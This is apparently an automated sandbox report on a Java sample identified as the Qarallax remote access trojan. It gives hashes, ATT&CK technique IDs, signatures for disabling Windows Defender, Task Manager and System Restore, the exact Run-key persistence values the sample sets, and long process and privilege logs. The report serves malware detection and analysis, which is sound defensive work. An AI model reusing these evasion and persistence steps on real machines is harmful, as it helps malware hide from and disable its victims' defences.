qarallax | af2282169fd256121196373e4a1171e44ab0dd830ffd5f2b49f5b5d0a9f6b473

Analysis

max time kernel
149s
max time network
149s
platform
windows10_x64
resource
win10v200722
submitted
06-08-2020 07:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

STATEMENT.jar
Size

410KB
MD5

c97cbc1f72a7a3100781e9e9dd0726c9
SHA1

cfd2845d70ba1de8fa041c844deacf5f72d360b2
SHA256

af2282169fd256121196373e4a1171e44ab0dd830ffd5f2b49f5b5d0a9f6b473
SHA512

0592feef2b9dfeeb87fd8dec6682664dbacfd4ec70e7e52d0dd08b39ba3590af4662c0cc5236bbd334e5b06c8a1207d06341b104000d889ebb6454ac2d18f9ba

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae10-53.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
728	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	java.exe
File created	C:\Users\Admin\hmJMe\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\sBxSt	java.exe
File created	C:\Windows\System32\sBxSt	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
4388	taskkill.exe
1960	taskkill.exe
4824	taskkill.exe
628	taskkill.exe
4104	taskkill.exe
4672	taskkill.exe
4088	taskkill.exe
4536	taskkill.exe
4500	taskkill.exe
3384	taskkill.exe
4280	taskkill.exe
2388	taskkill.exe
1772	taskkill.exe
3948	taskkill.exe
3876	taskkill.exe
4620	taskkill.exe
4404	taskkill.exe
3416	taskkill.exe
4448	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
536	powershell.exe
536	powershell.exe
536	powershell.exe
536	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
728	java.exe

Suspicious use of AdjustPrivilegeToken 125 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeSystemProfilePrivilege	2976	WMIC.exe
Token: SeSystemtimePrivilege	2976	WMIC.exe
Token: SeProfSingleProcessPrivilege	2976	WMIC.exe
Token: SeIncBasePriorityPrivilege	2976	WMIC.exe
Token: SeCreatePagefilePrivilege	2976	WMIC.exe
Token: SeBackupPrivilege	2976	WMIC.exe
Token: SeRestorePrivilege	2976	WMIC.exe
Token: SeShutdownPrivilege	2976	WMIC.exe
Token: SeDebugPrivilege	2976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2976	WMIC.exe
Token: SeRemoteShutdownPrivilege	2976	WMIC.exe
Token: SeUndockPrivilege	2976	WMIC.exe
Token: SeManageVolumePrivilege	2976	WMIC.exe
Token: 33	2976	WMIC.exe
Token: 34	2976	WMIC.exe
Token: 35	2976	WMIC.exe
Token: 36	2976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeSystemProfilePrivilege	2976	WMIC.exe
Token: SeSystemtimePrivilege	2976	WMIC.exe
Token: SeProfSingleProcessPrivilege	2976	WMIC.exe
Token: SeIncBasePriorityPrivilege	2976	WMIC.exe
Token: SeCreatePagefilePrivilege	2976	WMIC.exe
Token: SeBackupPrivilege	2976	WMIC.exe
Token: SeRestorePrivilege	2976	WMIC.exe
Token: SeShutdownPrivilege	2976	WMIC.exe
Token: SeDebugPrivilege	2976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2976	WMIC.exe
Token: SeRemoteShutdownPrivilege	2976	WMIC.exe
Token: SeUndockPrivilege	2976	WMIC.exe
Token: SeManageVolumePrivilege	2976	WMIC.exe
Token: 33	2976	WMIC.exe
Token: 34	2976	WMIC.exe
Token: 35	2976	WMIC.exe
Token: 36	2976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1000	WMIC.exe
Token: SeSecurityPrivilege	1000	WMIC.exe
Token: SeTakeOwnershipPrivilege	1000	WMIC.exe
Token: SeLoadDriverPrivilege	1000	WMIC.exe
Token: SeSystemProfilePrivilege	1000	WMIC.exe
Token: SeSystemtimePrivilege	1000	WMIC.exe
Token: SeProfSingleProcessPrivilege	1000	WMIC.exe
Token: SeIncBasePriorityPrivilege	1000	WMIC.exe
Token: SeCreatePagefilePrivilege	1000	WMIC.exe
Token: SeBackupPrivilege	1000	WMIC.exe
Token: SeRestorePrivilege	1000	WMIC.exe
Token: SeShutdownPrivilege	1000	WMIC.exe
Token: SeDebugPrivilege	1000	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1000	WMIC.exe
Token: SeRemoteShutdownPrivilege	1000	WMIC.exe
Token: SeUndockPrivilege	1000	WMIC.exe
Token: SeManageVolumePrivilege	1000	WMIC.exe
Token: 33	1000	WMIC.exe
Token: 34	1000	WMIC.exe
Token: 35	1000	WMIC.exe
Token: 36	1000	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1000	WMIC.exe
Token: SeSecurityPrivilege	1000	WMIC.exe
Token: SeTakeOwnershipPrivilege	1000	WMIC.exe
Token: SeLoadDriverPrivilege	1000	WMIC.exe
Token: SeSystemProfilePrivilege	1000	WMIC.exe
Token: SeSystemtimePrivilege	1000	WMIC.exe
Token: SeProfSingleProcessPrivilege	1000	WMIC.exe
Token: SeIncBasePriorityPrivilege	1000	WMIC.exe
Token: SeCreatePagefilePrivilege	1000	WMIC.exe
Token: SeBackupPrivilege	1000	WMIC.exe
Token: SeRestorePrivilege	1000	WMIC.exe
Token: SeShutdownPrivilege	1000	WMIC.exe
Token: SeDebugPrivilege	1000	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1000	WMIC.exe
Token: SeRemoteShutdownPrivilege	1000	WMIC.exe
Token: SeUndockPrivilege	1000	WMIC.exe
Token: SeManageVolumePrivilege	1000	WMIC.exe
Token: 33	1000	WMIC.exe
Token: 34	1000	WMIC.exe
Token: 35	1000	WMIC.exe
Token: 36	1000	WMIC.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	628	taskkill.exe
Token: SeDebugPrivilege	4500	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	4388	taskkill.exe
Token: SeDebugPrivilege	4672	taskkill.exe
Token: SeIncreaseQuotaPrivilege	536	powershell.exe
Token: SeSecurityPrivilege	536	powershell.exe
Token: SeTakeOwnershipPrivilege	536	powershell.exe
Token: SeLoadDriverPrivilege	536	powershell.exe
Token: SeSystemProfilePrivilege	536	powershell.exe
Token: SeSystemtimePrivilege	536	powershell.exe
Token: SeProfSingleProcessPrivilege	536	powershell.exe
Token: SeIncBasePriorityPrivilege	536	powershell.exe
Token: SeCreatePagefilePrivilege	536	powershell.exe
Token: SeBackupPrivilege	536	powershell.exe
Token: SeRestorePrivilege	536	powershell.exe
Token: SeShutdownPrivilege	536	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeSystemEnvironmentPrivilege	536	powershell.exe
Token: SeRemoteShutdownPrivilege	536	powershell.exe
Token: SeUndockPrivilege	536	powershell.exe
Token: SeManageVolumePrivilege	536	powershell.exe
Token: 33	536	powershell.exe
Token: 34	536	powershell.exe
Token: 35	536	powershell.exe
Token: 36	536	powershell.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	3876	taskkill.exe
Token: SeDebugPrivilege	3384	taskkill.exe
Token: SeDebugPrivilege	4620	taskkill.exe
Token: SeDebugPrivilege	4280	taskkill.exe
Token: SeDebugPrivilege	4404	taskkill.exe
Token: SeDebugPrivilege	3416	taskkill.exe
Token: SeDebugPrivilege	4448	taskkill.exe
Token: SeDebugPrivilege	4088	taskkill.exe
Token: SeDebugPrivilege	4824	taskkill.exe
Token: SeDebugPrivilege	2388	taskkill.exe
Token: SeDebugPrivilege	4536	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
728	java.exe

Suspicious use of WriteProcessMemory 412 IoCs

description	pid	Process	procid_target
PID 728 wrote to memory of 2404	728	java.exe	68
PID 728 wrote to memory of 2404	728	java.exe	68
PID 728 wrote to memory of 2688	728	java.exe	70
PID 728 wrote to memory of 2688	728	java.exe	70
PID 2688 wrote to memory of 2976	2688	cmd.exe	72
PID 2688 wrote to memory of 2976	2688	cmd.exe	72
PID 728 wrote to memory of 3852	728	java.exe	73
PID 728 wrote to memory of 3852	728	java.exe	73
PID 3852 wrote to memory of 1000	3852	cmd.exe	75
PID 3852 wrote to memory of 1000	3852	cmd.exe	75
PID 728 wrote to memory of 2868	728	java.exe	78
PID 728 wrote to memory of 2868	728	java.exe	78
PID 728 wrote to memory of 408	728	java.exe	80
PID 728 wrote to memory of 408	728	java.exe	80
PID 728 wrote to memory of 3828	728	java.exe	82
PID 728 wrote to memory of 3828	728	java.exe	82
PID 728 wrote to memory of 3904	728	java.exe	83
PID 728 wrote to memory of 3904	728	java.exe	83
PID 728 wrote to memory of 3508	728	java.exe	85
PID 728 wrote to memory of 3508	728	java.exe	85
PID 728 wrote to memory of 1356	728	java.exe	87
PID 728 wrote to memory of 1356	728	java.exe	87
PID 728 wrote to memory of 1588	728	java.exe	89
PID 728 wrote to memory of 1588	728	java.exe	89
PID 728 wrote to memory of 1724	728	java.exe	91
PID 728 wrote to memory of 1724	728	java.exe	91
PID 728 wrote to memory of 3292	728	java.exe	94
PID 728 wrote to memory of 3292	728	java.exe	94
PID 3292 wrote to memory of 3960	3292	cmd.exe	96
PID 3292 wrote to memory of 3960	3292	cmd.exe	96
PID 728 wrote to memory of 3656	728	java.exe	97
PID 728 wrote to memory of 3656	728	java.exe	97
PID 728 wrote to memory of 412	728	java.exe	98
PID 728 wrote to memory of 412	728	java.exe	98
PID 728 wrote to memory of 628	728	java.exe	99
PID 728 wrote to memory of 628	728	java.exe	99
PID 728 wrote to memory of 536	728	java.exe	100
PID 728 wrote to memory of 536	728	java.exe	100
PID 728 wrote to memory of 2872	728	java.exe	104
PID 728 wrote to memory of 2872	728	java.exe	104
PID 728 wrote to memory of 3908	728	java.exe	105
PID 728 wrote to memory of 3908	728	java.exe	105
PID 728 wrote to memory of 2396	728	java.exe	109
PID 728 wrote to memory of 2396	728	java.exe	109
PID 728 wrote to memory of 1576	728	java.exe	110
PID 728 wrote to memory of 1576	728	java.exe	110
PID 728 wrote to memory of 2352	728	java.exe	113
PID 728 wrote to memory of 2352	728	java.exe	113
PID 728 wrote to memory of 1000	728	java.exe	114
PID 728 wrote to memory of 1000	728	java.exe	114
PID 728 wrote to memory of 1360	728	java.exe	117
PID 728 wrote to memory of 1360	728	java.exe	117
PID 728 wrote to memory of 3104	728	java.exe	118
PID 728 wrote to memory of 3104	728	java.exe	118
PID 3292 wrote to memory of 4144	3292	cmd.exe	119
PID 3292 wrote to memory of 4144	3292	cmd.exe	119
PID 728 wrote to memory of 4180	728	java.exe	122
PID 728 wrote to memory of 4180	728	java.exe	122
PID 728 wrote to memory of 4200	728	java.exe	123
PID 728 wrote to memory of 4200	728	java.exe	123
PID 728 wrote to memory of 4280	728	java.exe	126
PID 728 wrote to memory of 4280	728	java.exe	126
PID 728 wrote to memory of 4296	728	java.exe	127
PID 728 wrote to memory of 4296	728	java.exe	127
PID 728 wrote to memory of 4396	728	java.exe	130
PID 728 wrote to memory of 4392	728	java.exe	131
PID 728 wrote to memory of 4392	728	java.exe	131
PID 728 wrote to memory of 4396	728	java.exe	130
PID 728 wrote to memory of 4500	728	java.exe	134
PID 728 wrote to memory of 4500	728	java.exe	134
PID 728 wrote to memory of 4544	728	java.exe	135
PID 728 wrote to memory of 4544	728	java.exe	135
PID 728 wrote to memory of 4588	728	java.exe	137
PID 728 wrote to memory of 4588	728	java.exe	137
PID 728 wrote to memory of 4652	728	java.exe	140
PID 728 wrote to memory of 4652	728	java.exe	140
PID 728 wrote to memory of 4740	728	java.exe	142
PID 728 wrote to memory of 4740	728	java.exe	142
PID 728 wrote to memory of 4808	728	java.exe	143
PID 728 wrote to memory of 4808	728	java.exe	143
PID 728 wrote to memory of 4880	728	java.exe	146
PID 728 wrote to memory of 4880	728	java.exe	146
PID 728 wrote to memory of 4928	728	java.exe	148
PID 728 wrote to memory of 4928	728	java.exe	148
PID 728 wrote to memory of 4952	728	java.exe	149
PID 728 wrote to memory of 4952	728	java.exe	149
PID 728 wrote to memory of 5064	728	java.exe	152
PID 728 wrote to memory of 5064	728	java.exe	152
PID 728 wrote to memory of 572	728	java.exe	154
PID 728 wrote to memory of 572	728	java.exe	154
PID 728 wrote to memory of 2096	728	java.exe	156
PID 728 wrote to memory of 2096	728	java.exe	156
PID 728 wrote to memory of 1692	728	java.exe	159
PID 728 wrote to memory of 1692	728	java.exe	159
PID 728 wrote to memory of 4104	728	java.exe	160
PID 728 wrote to memory of 4104	728	java.exe	160
PID 728 wrote to memory of 4236	728	java.exe	163
PID 728 wrote to memory of 4236	728	java.exe	163
PID 728 wrote to memory of 3828	728	java.exe	165
PID 728 wrote to memory of 3828	728	java.exe	165
PID 728 wrote to memory of 1448	728	java.exe	167
PID 728 wrote to memory of 1448	728	java.exe	167
PID 728 wrote to memory of 1364	728	java.exe	169
PID 728 wrote to memory of 1364	728	java.exe	169
PID 728 wrote to memory of 2352	728	java.exe	171
PID 728 wrote to memory of 2352	728	java.exe	171
PID 4928 wrote to memory of 4632	4928	cmd.exe	173
PID 4928 wrote to memory of 4632	4928	cmd.exe	173
PID 728 wrote to memory of 4388	728	java.exe	175
PID 728 wrote to memory of 4388	728	java.exe	175
PID 4928 wrote to memory of 4172	4928	cmd.exe	177
PID 4928 wrote to memory of 4172	4928	cmd.exe	177
PID 728 wrote to memory of 4660	728	java.exe	178
PID 728 wrote to memory of 4660	728	java.exe	178
PID 4660 wrote to memory of 4424	4660	cmd.exe	180
PID 4660 wrote to memory of 4424	4660	cmd.exe	180
PID 4660 wrote to memory of 4816	4660	cmd.exe	181
PID 4660 wrote to memory of 4816	4660	cmd.exe	181
PID 728 wrote to memory of 4672	728	java.exe	182
PID 728 wrote to memory of 4672	728	java.exe	182
PID 728 wrote to memory of 4688	728	java.exe	184
PID 728 wrote to memory of 4688	728	java.exe	184
PID 4688 wrote to memory of 4576	4688	cmd.exe	186
PID 4688 wrote to memory of 4576	4688	cmd.exe	186
PID 4688 wrote to memory of 4900	4688	cmd.exe	187
PID 4688 wrote to memory of 4900	4688	cmd.exe	187
PID 728 wrote to memory of 4772	728	java.exe	188
PID 728 wrote to memory of 4772	728	java.exe	188
PID 4772 wrote to memory of 4844	4772	cmd.exe	190
PID 4772 wrote to memory of 4844	4772	cmd.exe	190
PID 4772 wrote to memory of 4640	4772	cmd.exe	191
PID 4772 wrote to memory of 4640	4772	cmd.exe	191
PID 728 wrote to memory of 4652	728	java.exe	192
PID 728 wrote to memory of 4652	728	java.exe	192
PID 4652 wrote to memory of 4684	4652	cmd.exe	194
PID 4652 wrote to memory of 4684	4652	cmd.exe	194
PID 4652 wrote to memory of 4840	4652	cmd.exe	195
PID 4652 wrote to memory of 4840	4652	cmd.exe	195
PID 728 wrote to memory of 1136	728	java.exe	196
PID 728 wrote to memory of 1136	728	java.exe	196
PID 1136 wrote to memory of 5044	1136	cmd.exe	198
PID 1136 wrote to memory of 5044	1136	cmd.exe	198
PID 728 wrote to memory of 1960	728	java.exe	199
PID 728 wrote to memory of 1960	728	java.exe	199
PID 1136 wrote to memory of 1416	1136	cmd.exe	202
PID 1136 wrote to memory of 1416	1136	cmd.exe	202
PID 728 wrote to memory of 3908	728	java.exe	203
PID 728 wrote to memory of 3908	728	java.exe	203
PID 3908 wrote to memory of 4952	3908	cmd.exe	205
PID 3908 wrote to memory of 4952	3908	cmd.exe	205
PID 3908 wrote to memory of 3720	3908	cmd.exe	206
PID 3908 wrote to memory of 3720	3908	cmd.exe	206
PID 728 wrote to memory of 2876	728	java.exe	207
PID 728 wrote to memory of 2876	728	java.exe	207
PID 2876 wrote to memory of 3840	2876	cmd.exe	209
PID 2876 wrote to memory of 3840	2876	cmd.exe	209
PID 2876 wrote to memory of 1356	2876	cmd.exe	210
PID 2876 wrote to memory of 1356	2876	cmd.exe	210
PID 728 wrote to memory of 412	728	java.exe	211
PID 728 wrote to memory of 412	728	java.exe	211
PID 412 wrote to memory of 4156	412	cmd.exe	213
PID 412 wrote to memory of 4156	412	cmd.exe	213
PID 412 wrote to memory of 2396	412	cmd.exe	214
PID 412 wrote to memory of 2396	412	cmd.exe	214
PID 728 wrote to memory of 4316	728	java.exe	215
PID 728 wrote to memory of 4316	728	java.exe	215
PID 4316 wrote to memory of 408	4316	cmd.exe	217
PID 4316 wrote to memory of 408	4316	cmd.exe	217
PID 4316 wrote to memory of 636	4316	cmd.exe	218
PID 4316 wrote to memory of 636	4316	cmd.exe	218
PID 728 wrote to memory of 1576	728	java.exe	219
PID 728 wrote to memory of 1576	728	java.exe	219
PID 1576 wrote to memory of 4204	1576	cmd.exe	221
PID 1576 wrote to memory of 4204	1576	cmd.exe	221
PID 1576 wrote to memory of 2224	1576	cmd.exe	222
PID 1576 wrote to memory of 2224	1576	cmd.exe	222
PID 728 wrote to memory of 3948	728	java.exe	223
PID 728 wrote to memory of 3948	728	java.exe	223
PID 3948 wrote to memory of 4468	3948	cmd.exe	225
PID 3948 wrote to memory of 4468	3948	cmd.exe	225
PID 3948 wrote to memory of 4160	3948	cmd.exe	226
PID 3948 wrote to memory of 4160	3948	cmd.exe	226
PID 728 wrote to memory of 2352	728	java.exe	227
PID 728 wrote to memory of 2352	728	java.exe	227
PID 2352 wrote to memory of 4260	2352	cmd.exe	229
PID 2352 wrote to memory of 4260	2352	cmd.exe	229
PID 2352 wrote to memory of 4104	2352	cmd.exe	230
PID 2352 wrote to memory of 4104	2352	cmd.exe	230
PID 728 wrote to memory of 5056	728	java.exe	231
PID 728 wrote to memory of 5056	728	java.exe	231
PID 728 wrote to memory of 3876	728	java.exe	233
PID 728 wrote to memory of 3876	728	java.exe	233
PID 5056 wrote to memory of 3848	5056	cmd.exe	235
PID 5056 wrote to memory of 3848	5056	cmd.exe	235
PID 5056 wrote to memory of 4604	5056	cmd.exe	236
PID 5056 wrote to memory of 4604	5056	cmd.exe	236
PID 728 wrote to memory of 4360	728	java.exe	237
PID 728 wrote to memory of 4360	728	java.exe	237
PID 4360 wrote to memory of 4356	4360	cmd.exe	239
PID 4360 wrote to memory of 4356	4360	cmd.exe	239
PID 4360 wrote to memory of 4748	4360	cmd.exe	240
PID 4360 wrote to memory of 4748	4360	cmd.exe	240
PID 728 wrote to memory of 4700	728	java.exe	241
PID 728 wrote to memory of 4700	728	java.exe	241
PID 4700 wrote to memory of 2716	4700	cmd.exe	243
PID 4700 wrote to memory of 2716	4700	cmd.exe	243
PID 4700 wrote to memory of 4928	4700	cmd.exe	244
PID 4700 wrote to memory of 4928	4700	cmd.exe	244
PID 728 wrote to memory of 5008	728	java.exe	245
PID 728 wrote to memory of 5008	728	java.exe	245
PID 5008 wrote to memory of 4424	5008	cmd.exe	247
PID 5008 wrote to memory of 4424	5008	cmd.exe	247
PID 5008 wrote to memory of 4196	5008	cmd.exe	248
PID 5008 wrote to memory of 4196	5008	cmd.exe	248
PID 728 wrote to memory of 4364	728	java.exe	249
PID 728 wrote to memory of 4364	728	java.exe	249
PID 4364 wrote to memory of 4280	4364	cmd.exe	251
PID 4364 wrote to memory of 4280	4364	cmd.exe	251
PID 4364 wrote to memory of 4920	4364	cmd.exe	252
PID 4364 wrote to memory of 4920	4364	cmd.exe	252
PID 728 wrote to memory of 4904	728	java.exe	253
PID 728 wrote to memory of 4904	728	java.exe	253
PID 728 wrote to memory of 3384	728	java.exe	255
PID 728 wrote to memory of 3384	728	java.exe	255
PID 4904 wrote to memory of 4024	4904	cmd.exe	256
PID 4904 wrote to memory of 4024	4904	cmd.exe	256
PID 4904 wrote to memory of 4888	4904	cmd.exe	258
PID 4904 wrote to memory of 4888	4904	cmd.exe	258
PID 728 wrote to memory of 4684	728	java.exe	259
PID 728 wrote to memory of 4684	728	java.exe	259
PID 4684 wrote to memory of 5088	4684	cmd.exe	261
PID 4684 wrote to memory of 5088	4684	cmd.exe	261
PID 4684 wrote to memory of 2100	4684	cmd.exe	262
PID 4684 wrote to memory of 2100	4684	cmd.exe	262
PID 728 wrote to memory of 4956	728	java.exe	263
PID 728 wrote to memory of 4956	728	java.exe	263
PID 4956 wrote to memory of 1252	4956	cmd.exe	265
PID 4956 wrote to memory of 1252	4956	cmd.exe	265
PID 4956 wrote to memory of 1952	4956	cmd.exe	266
PID 4956 wrote to memory of 1952	4956	cmd.exe	266
PID 728 wrote to memory of 4952	728	java.exe	267
PID 728 wrote to memory of 4952	728	java.exe	267
PID 4952 wrote to memory of 3300	4952	cmd.exe	269
PID 4952 wrote to memory of 3300	4952	cmd.exe	269
PID 4952 wrote to memory of 4328	4952	cmd.exe	270
PID 4952 wrote to memory of 4328	4952	cmd.exe	270
PID 728 wrote to memory of 3840	728	java.exe	271
PID 728 wrote to memory of 3840	728	java.exe	271
PID 3840 wrote to memory of 4116	3840	cmd.exe	273
PID 3840 wrote to memory of 4116	3840	cmd.exe	273
PID 3840 wrote to memory of 3200	3840	cmd.exe	274
PID 3840 wrote to memory of 3200	3840	cmd.exe	274
PID 728 wrote to memory of 3980	728	java.exe	275
PID 728 wrote to memory of 3980	728	java.exe	275
PID 3980 wrote to memory of 4784	3980	cmd.exe	277
PID 3980 wrote to memory of 4784	3980	cmd.exe	277
PID 728 wrote to memory of 4620	728	java.exe	278
PID 728 wrote to memory of 4620	728	java.exe	278
PID 3980 wrote to memory of 1536	3980	cmd.exe	280
PID 3980 wrote to memory of 1536	3980	cmd.exe	280
PID 728 wrote to memory of 2004	728	java.exe	281
PID 728 wrote to memory of 2004	728	java.exe	281
PID 2004 wrote to memory of 4496	2004	cmd.exe	283
PID 2004 wrote to memory of 4496	2004	cmd.exe	283
PID 2004 wrote to memory of 2224	2004	cmd.exe	284
PID 2004 wrote to memory of 2224	2004	cmd.exe	284
PID 728 wrote to memory of 1364	728	java.exe	285
PID 728 wrote to memory of 1364	728	java.exe	285
PID 1364 wrote to memory of 4516	1364	cmd.exe	287
PID 1364 wrote to memory of 4516	1364	cmd.exe	287
PID 1364 wrote to memory of 1724	1364	cmd.exe	288
PID 1364 wrote to memory of 1724	1364	cmd.exe	288
PID 728 wrote to memory of 4344	728	java.exe	289
PID 728 wrote to memory of 4344	728	java.exe	289
PID 4344 wrote to memory of 4224	4344	cmd.exe	291
PID 4344 wrote to memory of 4224	4344	cmd.exe	291
PID 4344 wrote to memory of 4200	4344	cmd.exe	292
PID 4344 wrote to memory of 4200	4344	cmd.exe	292
PID 728 wrote to memory of 4824	728	java.exe	293
PID 728 wrote to memory of 4824	728	java.exe	293
PID 4824 wrote to memory of 4384	4824	cmd.exe	295
PID 4824 wrote to memory of 4384	4824	cmd.exe	295
PID 4824 wrote to memory of 4436	4824	cmd.exe	296
PID 4824 wrote to memory of 4436	4824	cmd.exe	296
PID 728 wrote to memory of 1496	728	java.exe	297
PID 728 wrote to memory of 1496	728	java.exe	297
PID 1496 wrote to memory of 4860	1496	cmd.exe	301
PID 1496 wrote to memory of 4860	1496	cmd.exe	301
PID 1496 wrote to memory of 4396	1496	cmd.exe	302
PID 1496 wrote to memory of 4396	1496	cmd.exe	302
PID 728 wrote to memory of 4280	728	java.exe	303
PID 728 wrote to memory of 4280	728	java.exe	303
PID 728 wrote to memory of 1588	728	java.exe	305
PID 728 wrote to memory of 1588	728	java.exe	305
PID 1588 wrote to memory of 5052	1588	cmd.exe	307
PID 1588 wrote to memory of 5052	1588	cmd.exe	307
PID 1588 wrote to memory of 4664	1588	cmd.exe	308
PID 1588 wrote to memory of 4664	1588	cmd.exe	308
PID 728 wrote to memory of 2756	728	java.exe	310
PID 728 wrote to memory of 2756	728	java.exe	310
PID 2756 wrote to memory of 4624	2756	cmd.exe	312
PID 2756 wrote to memory of 4624	2756	cmd.exe	312
PID 2756 wrote to memory of 4772	2756	cmd.exe	313
PID 2756 wrote to memory of 4772	2756	cmd.exe	313
PID 728 wrote to memory of 4764	728	java.exe	314
PID 728 wrote to memory of 4764	728	java.exe	314
PID 4764 wrote to memory of 800	4764	cmd.exe	316
PID 4764 wrote to memory of 800	4764	cmd.exe	316
PID 4764 wrote to memory of 2248	4764	cmd.exe	317
PID 4764 wrote to memory of 2248	4764	cmd.exe	317
PID 728 wrote to memory of 4320	728	java.exe	318
PID 728 wrote to memory of 4320	728	java.exe	318
PID 4320 wrote to memory of 4960	4320	cmd.exe	320
PID 4320 wrote to memory of 4960	4320	cmd.exe	320
PID 4320 wrote to memory of 4296	4320	cmd.exe	321
PID 4320 wrote to memory of 4296	4320	cmd.exe	321
PID 728 wrote to memory of 4404	728	java.exe	322
PID 728 wrote to memory of 4404	728	java.exe	322
PID 728 wrote to memory of 4560	728	java.exe	324
PID 728 wrote to memory of 4560	728	java.exe	324
PID 4560 wrote to memory of 4756	4560	cmd.exe	326
PID 4560 wrote to memory of 4756	4560	cmd.exe	326
PID 4560 wrote to memory of 4036	4560	cmd.exe	327
PID 4560 wrote to memory of 4036	4560	cmd.exe	327
PID 728 wrote to memory of 4676	728	java.exe	328
PID 728 wrote to memory of 4676	728	java.exe	328
PID 4676 wrote to memory of 4648	4676	cmd.exe	330
PID 4676 wrote to memory of 4648	4676	cmd.exe	330
PID 4676 wrote to memory of 1276	4676	cmd.exe	331
PID 4676 wrote to memory of 1276	4676	cmd.exe	331
PID 728 wrote to memory of 1324	728	java.exe	332
PID 728 wrote to memory of 1324	728	java.exe	332
PID 1324 wrote to memory of 1960	1324	cmd.exe	334
PID 1324 wrote to memory of 1960	1324	cmd.exe	334
PID 1324 wrote to memory of 1252	1324	cmd.exe	335
PID 1324 wrote to memory of 1252	1324	cmd.exe	335
PID 728 wrote to memory of 5104	728	java.exe	336
PID 728 wrote to memory of 5104	728	java.exe	336
PID 5104 wrote to memory of 3932	5104	cmd.exe	338
PID 5104 wrote to memory of 3932	5104	cmd.exe	338
PID 5104 wrote to memory of 4156	5104	cmd.exe	339
PID 5104 wrote to memory of 4156	5104	cmd.exe	339
PID 728 wrote to memory of 4116	728	java.exe	340
PID 728 wrote to memory of 4116	728	java.exe	340
PID 4116 wrote to memory of 4788	4116	cmd.exe	342
PID 4116 wrote to memory of 4788	4116	cmd.exe	342
PID 4116 wrote to memory of 4784	4116	cmd.exe	343
PID 4116 wrote to memory of 4784	4116	cmd.exe	343
PID 728 wrote to memory of 2668	728	java.exe	344
PID 728 wrote to memory of 2668	728	java.exe	344
PID 2668 wrote to memory of 4220	2668	cmd.exe	346
PID 2668 wrote to memory of 4220	2668	cmd.exe	346
PID 2668 wrote to memory of 4944	2668	cmd.exe	347
PID 2668 wrote to memory of 4944	2668	cmd.exe	347
PID 728 wrote to memory of 3960	728	java.exe	348
PID 728 wrote to memory of 3960	728	java.exe	348
PID 3960 wrote to memory of 4428	3960	cmd.exe	350
PID 3960 wrote to memory of 4428	3960	cmd.exe	350
PID 3960 wrote to memory of 964	3960	cmd.exe	351
PID 3960 wrote to memory of 964	3960	cmd.exe	351
PID 728 wrote to memory of 2760	728	java.exe	352
PID 728 wrote to memory of 2760	728	java.exe	352
PID 2760 wrote to memory of 4636	2760	cmd.exe	354
PID 2760 wrote to memory of 4636	2760	cmd.exe	354
PID 2760 wrote to memory of 4172	2760	cmd.exe	355
PID 2760 wrote to memory of 4172	2760	cmd.exe	355
PID 728 wrote to memory of 4384	728	java.exe	356
PID 728 wrote to memory of 4384	728	java.exe	356
PID 4384 wrote to memory of 4452	4384	cmd.exe	358
